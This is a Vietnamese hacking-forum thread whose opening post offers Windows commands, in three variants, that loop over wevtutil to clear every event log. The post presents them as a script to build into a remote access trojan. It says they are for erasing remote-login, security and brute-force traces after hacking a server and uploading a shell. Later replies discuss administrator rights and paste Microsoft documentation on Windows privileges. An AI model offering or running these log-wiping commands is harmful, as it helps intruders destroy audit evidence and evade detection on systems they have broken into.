Script hay nên tích hợp vào RAT ...

Phanonra

Banned
07/11/2013
1
205 bài viết
Script hay nên tích hợp vào RAT ...
PHP:
C:\windows\system32\cmd.exe /c for /f %x in ('wevtutil el') do wevtutil cl "%x"

PHP:
WEVTUTIL EL > .\LOGLIST.TXTfor /f %%a in ( .\LOGLIST.TXT ) do WEVTUTIL CL "%%a"del .\LOGLIST.TXT timeout 30

PHP:
for /f %%a in ('WEVTUTIL EL') do WEVTUTIL CL "%%a"
timeout 30

Cái này dùng để clear event logs :cool:

Giả sử remote vô server hack đc , up shell thành công ... Trong event logs sẽ có lưu thông tin remote , security , brute ...

Chạy thêm đoạn script đấy -> em vô tội :eek:

ps: để chạy đc , phải có quyền administrators trở lên nhé
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: Script hay nên tích hợp vào RAT ...

admin là quyền cao nhất rồi còn quyền nào cao hơn nữa hả pro phanora?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Script hay nên tích hợp vào RAT ...

[h=1]Privileges[/h]
A privilege is the right of an account, such as a user or group account, to perform various system-related operations on the local computer, such as shutting down the system, loading device drivers, or changing the system time. Privileges differ from access rights in two ways:

  • Privileges control access to system resources and system-related tasks, whereas access rights control access tosecurable objects.
  • A system administrator assigns privileges to user and group accounts, whereas the system grants or denies access to a securable object based on the access rights granted in the ACEs in the object's DACL.
Each system has an account database that stores the privileges held by user and group accounts. When a user logs on, the system produces an access token that contains a list of the user's privileges, including those granted to the user or to groups to which the user belongs. Note that the privileges apply only to the local computer; a domain account can have different privileges on different computers.
When the user tries to perform a privileged operation, the system checks the user's access token to determine whether the user holds the necessary privileges, and if so, it checks whether the privileges are enabled. If the user fails these tests, the system does not perform the operation.
To determine the privileges held in an access token, call the GetTokenInformation function, which also indicates which privileges are enabled. Most privileges are disabled by default.
The Windows API defines a set of string constants, such as SE_ASSIGNPRIMARYTOKEN_NAME, to identify the various privileges. These constants are the same on all systems and are defined in Winnt.h. For a table of the privileges defined by Windows, see Privilege Constants. However, the functions that get and adjust the privileges in an access token use theLUID type to identify privileges. The LUID values for a privilege can differ from one computer to another, and from one boot to another on the same computer. To get the current LUID that corresponds to one of the string constants, use theLookupPrivilegeValue function. Use the LookupPrivilegeName function to convert a LUID to its corresponding string constant.
The system provides a set of display names that describe each of the privileges. These are useful when you need to display a description of a privilege to the user. Use the LookupPrivilegeDisplayName function to retrieve a description string that corresponds to the string constant for a privilege. For example, on systems that use U.S. English, the display name for the SE_SYSTEMTIME_NAME privilege is "Change the system time".
You can use the PrivilegeCheck function to determine whether an access token holds a specified set of privileges. This is useful primarily to server applications that are impersonating a client.

A system administrator can use administrative tools, such as User Manager, to add or remove privileges for user and group accounts. Administrators can programmatically use the Local Security Authority (LSA) functions to work with privileges. The LsaAddAccountRights and LsaRemoveAccountRights functions add or remove privileges from an account. The LsaEnumerateAccountRights function enumerates the privileges held by a specified account. TheLsaEnumerateAccountsWithUserRight function enumerates the accounts that hold a specified privilege.

Đọc đây nè bro !

 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên